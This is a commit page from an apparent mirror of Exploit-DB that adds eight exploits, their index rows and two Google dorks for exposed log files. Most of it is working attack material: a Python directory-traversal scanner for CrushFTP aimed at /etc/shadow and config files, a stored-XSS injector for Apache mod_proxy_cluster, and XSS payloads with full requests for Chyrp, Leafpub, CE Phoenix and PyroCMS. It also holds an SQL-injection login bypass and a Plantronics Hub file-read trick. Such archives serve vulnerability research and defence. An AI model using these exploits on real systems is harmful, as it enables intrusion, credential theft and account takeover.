bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-05-14

Browse source 
10 changes to exploits/shellcodes/ghdb

CrushFTP < 11.1.0 - Directory Traversal

Apache mod_proxy_cluster - Stored XSS

CE Phoenix Version 1.0.8.20 - Stored XSS

Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)

Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)

Prison Management System - SQL Injection Authentication Bypass

PyroCMS v3.0.1 - Stored XSS

Plantronics Hub 3.25.1 - Arbitrary File Read
This commit is contained in:
Exploit-DB 2024-05-14 00:16:26 +00:00
parent edacab1df2
commit 9d17a3d6ca
10 changed files with 393 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

63
exploits/multiple/remote/52012.py Executable file
View file

@ -0,0 +1,63 @@
## Exploit Title: CrushFTP Directory Traversal
## Google Dork: N/A
# Date: 2024-04-30
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
## Vendor Homepage: https://www.crushftp.com/
## Software Link: https://www.crushftp.com/download/
## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)
## Tested on: Windows10
import requests
import re
# Regular expression to validate the URL
def is_valid_url(url):
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:A-Z0-9?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
r'(?::\d+)?' # optional: port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return re.match(regex, url) is not None
# Function to scan for the vulnerability
def scan_for_vulnerability(url, target_files):
print("Scanning for vulnerability in the following files:")
for target_file in target_files:
print(target_file)
for target_file in target_files:
try:
response = requests.get(url + "?/../../../../../../../../../../" + target_file, timeout=10)
if response.status_code == 200 and target_file.split('/')[-1] in response.text:
print("vulnerability detected in file", target_file)
print("Content of file", target_file, ":")
print(response.text)
else:
print("vulnerability not detected or unexpected response for file", target_file)
except requests.exceptions.RequestException as e:
print("Error connecting to the server:", e)
# User input
input_url = input("Enter the URL of the CrushFTP server: ")
# Validate the URL
if is_valid_url(input_url):
# Expanded list of allowed files
target_files = [
"/var/www/html/index.php",
"/var/www/html/wp-config.php",
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/etc/ssh/sshd_config",
"/etc/mysql/my.cnf",
# Add more files as needed
]
# Start the scan
scan_for_vulnerability(input_url, target_files)
else:
print("Invalid URL entered. Please enter a valid URL.")

109
exploits/php/webapps/52010.py Executable file
View file

@ -0,0 +1,109 @@
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from requests.exceptions import RequestException
class Colors:
RED = '\033[91m'
GREEN = '\033[1;49;92m'
RESET = '\033[0m'
def get_cluster_manager_url(base_url, path):
print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
try:
response = requests.get(base_url + path)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(Colors.RED + f"Error: {e}" + Colors.RESET)
return None
print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)
if response.status_code == 200:
print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
# Use BeautifulSoup to parse the HTML content
soup = BeautifulSoup(response.text, 'html.parser')
# Find all 'a' tags with 'href' attribute
all_links = soup.find_all('a', href=True)
# Search for the link containing the Alias parameter in the href attribute
cluster_manager_url = None
for link in all_links:
parsed_url = urlparse(link['href'])
query_params = parse_qs(parsed_url.query)
alias_value = query_params.get('Alias', [None])[0]
if alias_value:
print(Colors.GREEN + f"Alias value found" + Colors.RESET)
cluster_manager_url = link['href']
break
if cluster_manager_url:
print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
return cluster_manager_url
else:
print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
return None
print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")
return None
def update_alias_value(url):
parsed_url = urlparse(url)
query_params = parse_qs(parsed_url.query, keep_blank_values=True)
query_params['Alias'] = ["<DedSec-47>"]
updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
return updated_url
def check_response_for_value(url, check_value):
response = requests.get(url)
if check_value in response.text:
print(Colors.RED + "Website is vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
else:
print(Colors.GREEN + "Website is not vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
def main():
# Create a command-line argument parser
parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")
# Add a command-line argument for the target (-t/--target)
parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)
# Add a command-line argument for the URL path (-u/--url)
parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)
# Parse the command-line arguments
args = parser.parse_args()
# Get the cluster manager URL from the specified website
cluster_manager_url = get_cluster_manager_url(args.target, args.url)
# Check if the cluster manager URL is found
if cluster_manager_url:
# Modify the URL by adding the cluster manager value
modified_url = args.target + cluster_manager_url
modified_url = update_alias_value(args.target + cluster_manager_url)
print(Colors.GREEN + "Check executed successfully" + Colors.RESET)
# Check the response for the value "<DedSec-47>"
check_response_for_value(modified_url, "<DedSec-47>")
if __name__ == "__main__":
main()

80
exploits/php/webapps/52013.txt Normal file
View file

@ -0,0 +1,80 @@
# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/chyrp/
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
# Version: 2.5.2
# Tested on: MacOS
### Steps to Reproduce ###
- Login from the address: http://localhost/chyrp/?action=login.
- Click on 'Write'.
- Type this payload into the 'Title' field: "><img src=x onerror=alert(
"Stored")>
- Fill in the 'Body' area and click 'Publish'.
- An alert message saying "Stored" will appear in front of you.
### PoC Request ###
POST /chyrp/admin/?action=add_post HTTP/1.1
Host: localhost
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;
show_more_options=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------28307567523233313132815561598
Content-Length: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="title"
"><img src=x onerror=alert("Stored")>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="body"
<p>1337</p>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="status"
public
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="slug"
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="created_at"
04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="original_time"
04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="trackbacks"
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="feather"
text
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="hash"
11e11aba15114f918ec1c2e6b8f8ddcf
-----------------------------28307567523233313132815561598--

39
exploits/php/webapps/52014.txt Normal file
View file

@ -0,0 +1,39 @@
# Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/Leafpub
# Software Link: https://github.com/Leafpub/leafpub
# Version: 1.1.9
# Tested on: MacOS
### Steps to Reproduce ###
- Please login from this address: http://localhost/leafpub/admin/login
- Click on the Settings > Advanced
- Enter the following payload into the "Custom Code" area and save it: ("><img
src=x onerror=alert("Stored")>)
- An alert message saying "Stored" will appear in front of you.
### PoC Request ###
POST /leafpub/api/settings HTTP/1.1
Host: localhost
Cookie:
authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 476
Origin: http://localhost
Referer: http://localhost/leafpub/admin/settings
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on

14
exploits/php/webapps/52015.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://phoenixcart.org/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix
## POC:
1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php
4-You will be see alert button

17
exploits/php/webapps/52016.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: PyroCMS v3.0.1 - Stored XSS
# Date: 2023-11-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://pyrocms.com/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS
----------------------------------------------------------------------------------------------------
1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1
2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://127.0.0.1/public/admin/redirects
4-You will be see alert button

14
exploits/php/webapps/52017.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass
# Date: 15/03/2024
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Tested on: Windows ,XAMPP
# CVE : CVE-2024-33288
# Proof of Concept:
Step 1-Visit http://localhost/prison/
Step 2 - Click on Admin Dashboard button and redirect on login page.
Step 3 Enter username as admin' or '1'='1 and password as 123456
Step 4 Click sing In and now you will be logged in as admin.

25
exploits/windows/local/52011.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Plantronics Hub 3.25.1 Arbitrary File Read
# Date: 2024-05-10
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from
Mastercard
# Vendor Homepage:
https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
# Version: Plantronics Hub for Windows version 3.25.1
# Tested on: Windows 10/11
# CVE : CVE-2024-27460
As a regular user drop a file called "MajorUpgrade.config" inside the
"C:\ProgramData\Plantronics\Spokes3G" directory. The content of
MajorUpgrade.config should look like the following one liner:
^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy
(any file on the system). The desired file will be copied into C:\Program
Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp
Steps to reproduce (POC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
- Desired file will be copied into C:\Program Files
(x86)\Plantronics\Spokes3G\UpdateServiceTemp

8
files_exploits.csv
View file

@ -10813,6 +10813,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple,,2009-06-28,2016-12-30,1,OSVDB-55515;CVE-2009-2275,,,,,
21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0787;OSVDB-9240,,,,,https://www.securityfocus.com/bid/4717/info
21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0786;OSVDB-14438,,,,,https://www.securityfocus.com/bid/4718/info
52012,exploits/multiple/remote/52012.py,"CrushFTP < 11.1.0 - Directory Traversal",2024-05-13,"Abdualhadi khalifa",remote,multiple,,2024-05-13,2024-05-13,0,,,,,,
38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple,,2012-11-07,2015-11-05,1,CVE-2013-2261;OSVDB-95000,,,,,https://www.securityfocus.com/bid/61090/info
38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple,,2015-11-07,2015-11-05,1,CVE-2013-4103;OSVDB-95007,,,,,https://www.securityfocus.com/bid/61093/info
31918,exploits/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",remote,multiple,,2008-06-15,2014-02-27,1,CVE-2008-6737;OSVDB-46260,,,,,https://www.securityfocus.com/bid/29720/info
@ -14115,6 +14116,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27104,exploits/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-17,2013-07-26,1,CVE-2006-0310;OSVDB-22526,,,,,https://www.securityfocus.com/bid/16286/info
20866,exploits/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",webapps,php,,2012-08-27,2012-08-27,0,OSVDB-85265;OSVDB-85264,,,,http://www.exploit-db.comaoop_0.3.6_minimal.rar,http://security.inshell.net/advisory/23
12721,exploits/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,webapps,php,,2010-05-23,2011-02-15,1,OSVDB-59001,,,,,
52010,exploits/php/webapps/52010.py,"Apache mod_proxy_cluster - Stored XSS",2024-05-13,"Mohamed Mounir Boudjema",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
12330,exploits/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,"Lucas Apa",webapps,php,,2010-04-20,,1,CVE-2010-0432;OSVDB-64522;OSVDB-64521;OSVDB-64520;OSVDB-64519;OSVDB-64518;OSVDB-64517;OSVDB-64516,,,,,http://www.bonsai-sec.com/research/vulnerabilities/apacheofbiz-multiple-xss-0103.php
42520,exploits/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,webapps,php,,2017-08-21,2017-08-21,0,CVE-2017-12971;CVE-2017-12970;CVE-2017-12965,,,,,
5471,exploits/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,webapps,php,,2008-04-18,2016-11-24,1,OSVDB-44533;CVE-2008-1919,,,,,
@ -15550,6 +15552,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11401,exploits/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-10,,1,OSVDB-62278;CVE-2010-0762,,,,,
2540,exploits/php/webapps/2540.txt,"Cdsagenda 4.2.9 - 'SendAlertEmail.php' File Inclusion",2006-10-13,Drago84,webapps,php,,2006-10-12,2016-09-12,1,OSVDB-29735;CVE-2006-5384,,,,http://www.exploit-db.comcdsagenda-4.2.9.tar.gz,
51957,exploits/php/webapps/51957.py,"CE Phoenix v1.0.8.20 - Remote Code Execution",2024-04-02,tmrswrr,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
52015,exploits/php/webapps/52015.txt,"CE Phoenix Version 1.0.8.20 - Stored XSS",2024-05-13,tmrswrr,webapps,php,,2024-05-13,2024-05-13,0,,,,,,
22241,exploits/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php,,2003-02-09,2012-10-25,1,CVE-2003-1410;OSVDB-5487,,,,,https://www.securityfocus.com/bid/6818/info
22242,exploits/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php,,2003-02-09,2012-10-25,1,CVE-2003-1411;OSVDB-5900,,,,,https://www.securityfocus.com/bid/6820/info
29624,exploits/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,webapps,php,,2007-02-21,2013-11-16,1,CVE-2007-1020;OSVDB-33734,,,,,https://www.securityfocus.com/bid/22653/info
@ -15720,6 +15723,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info
36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79455,,,,,https://www.securityfocus.com/bid/52117/info
52013,exploits/php/webapps/52013.txt,"Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)",2024-05-13,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
35943,exploits/php/webapps/35943.txt,"Chyrp 2.x - '/admin/help.php' Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,Wireghoul,webapps,php,,2011-07-13,2015-01-29,1,CVE-2011-2743;OSVDB-73889,,,,,https://www.securityfocus.com/bid/48672/info
35944,exploits/php/webapps/35944.txt,"Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting",2011-07-13,Wireghoul,webapps,php,,2011-07-13,2015-01-29,1,CVE-2011-2743;OSVDB-73888,,,,,https://www.securityfocus.com/bid/48672/info
35946,exploits/php/webapps/35946.txt,"Chyrp 2.x - '/includes/lib/gz.php?File' Traversal Arbitrary File Access",2011-07-29,Wireghoul,webapps,php,,2011-07-29,2015-01-29,1,CVE-2011-2780;OSVDB-73891,,,,,https://www.securityfocus.com/bid/48672/info
@ -22529,6 +22533,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5887,exploits/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,OSVDB-46498;CVE-2008-2833,,,,,
36647,exploits/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,webapps,php,,2012-01-21,2015-04-06,1,CVE-2012-0932;OSVDB-78455,,,,,https://www.securityfocus.com/bid/51785/info
51471,exploits/php/webapps/51471.txt,"LeadPro CRM v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
52014,exploits/php/webapps/52014.txt,"Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)",2024-05-13,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
11889,exploits/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,webapps,php,,2010-03-25,,1,OSVDB-63417;OSVDB-63416,,,,,
8576,exploits/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1613,,,,,
8577,exploits/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1615;OSVDB-54404;CVE-2009-1614;OSVDB-54403;OSVDB-54402;CVE-2009-1613,,,,,
@ -28364,6 +28369,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28264,exploits/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,webapps,php,,2006-07-24,2013-09-13,1,,,,,,https://www.securityfocus.com/bid/19138/info
31164,exploits/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,webapps,php,,2008-02-12,2014-01-23,1,,,,,,https://www.securityfocus.com/bid/27761/info
49877,exploits/php/webapps/49877.txt,"Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection",2021-05-17,bwnz,webapps,php,,2021-05-17,2021-10-29,0,,,,,,
52017,exploits/php/webapps/52017.txt,"Prison Management System - SQL Injection Authentication Bypass",2024-05-13,"Sanjay Singh",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
6639,exploits/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,webapps,php,,2008-09-29,,1,OSVDB-48655;CVE-2008-6012,,,,,
44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,,2018-05-21,2018-05-22,0,,,,,,
23486,exploits/php/webapps/23486.txt,"Private Message System 2.x - 'index.php?Page' Cross-Site Scripting",2003-12-27,"David S. Ferreira",webapps,php,,2003-12-27,2012-12-18,1,,,,,,https://www.securityfocus.com/bid/9308/info
@ -28572,6 +28578,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23060,exploits/php/webapps/23060.txt,"Py-Membres 4.x - 'Secure.php' Unauthorized Access",2003-08-26,frog,webapps,php,,2003-08-26,2012-12-02,1,,,,,,https://www.securityfocus.com/bid/8499/info
46206,exploits/php/webapps/46206.txt,"Pydio / AjaXplorer < 5.0.4 - (Unauthenticated) Arbitrary File Upload",2019-01-18,_jazz______,webapps,php,80,2019-01-18,2019-03-17,0,CVE-2013-6227,,,,http://www.exploit-db.comajaxplorer-core-4.2.3.tar.gz,
18985,exploits/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,webapps,php,,2012-06-05,2012-06-05,0,OSVDB-82636;OSVDB-82626,,,,http://www.exploit-db.compyrocms-pyrocms-v2.1.1-0-ge5f0c6b.tar.gz,http://www.pyrocms.com/store/details/pyrocms_professional
52016,exploits/php/webapps/52016.txt,"PyroCMS v3.0.1 - Stored XSS",2024-05-13,tmrswrr,webapps,php,,2024-05-13,2024-05-13,0,,,,,,
29631,exploits/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 - Cross-Site Scripting",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1159;OSVDB-36879,,,,,https://www.securityfocus.com/bid/22667/info
8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php,,2009-02-22,,1,,,,,,
29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1152;OSVDB-37398,,,,,https://www.securityfocus.com/bid/22667/info
@ -41470,6 +41477,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,,2020-01-03,2020-02-10,1,,,,,,
47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,,2020-01-17,2020-01-17,1,CVE-2019-15742,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,,2020-01-17,2020-01-17,1,CVE-2019-15742,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb
52011,exploits/windows/local/52011.txt,"Plantronics Hub 3.25.1 - Arbitrary File Read",2024-05-13,"Alaa Kachouh",local,windows,,2024-05-13,2024-05-13,0,,,,,,
9379,exploits/windows/local/9379.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' Local Stack Overflow (SEH)",2009-08-06,germaya_x,local,windows,,2009-08-05,,1,OSVDB-55802,,,,,
17166,exploits/windows/local/17166.py,"PlaylistMaker 1.5 - '.txt' Local Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",local,windows,,2011-04-13,2011-04-14,1,,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-04-14-at-31237-pm.png,http://www.exploit-db.complaylistmaker15.zip,
9466,exploits/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,local,windows,,2009-08-17,,1,,,,,,

Can't render this file because it is too large.

24
ghdb.xml
View file

@ -65470,6 +65470,18 @@ Dxtroyer</textualDescription>
<date>2020-10-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8440</id>
<link>https://www.exploit-db.com/ghdb/8440</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;Header for logs at time&quot; ext:log</shortDescription>
<textualDescription>&quot;Header for logs at time&quot; ext:log</textualDescription>
<query>&quot;Header for logs at time&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;Header for logs at time&quot; ext:log</querystring>
<edb></edb>
<date>2024-05-13</date>
<author>Nadir Boulacheb (RubX)</author>
</entry>
<entry>
<id>6535</id>
<link>https://www.exploit-db.com/ghdb/6535</link>
@ -65505,6 +65517,18 @@ Sahil Saxena
<date>2004-04-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>8441</id>
<link>https://www.exploit-db.com/ghdb/8441</link>
<category>Files Containing Usernames</category>
<shortDescription>&quot;START test_database&quot; ext:log</shortDescription>
<textualDescription>&quot;START test_database&quot; ext:log</textualDescription>
<query>&quot;START test_database&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;START test_database&quot; ext:log</querystring>
<edb></edb>
<date>2024-05-13</date>
<author>Nadir Boulacheb (RubX)</author>
</entry>
<entry>
<id>4858</id>
<link>https://www.exploit-db.com/ghdb/4858</link>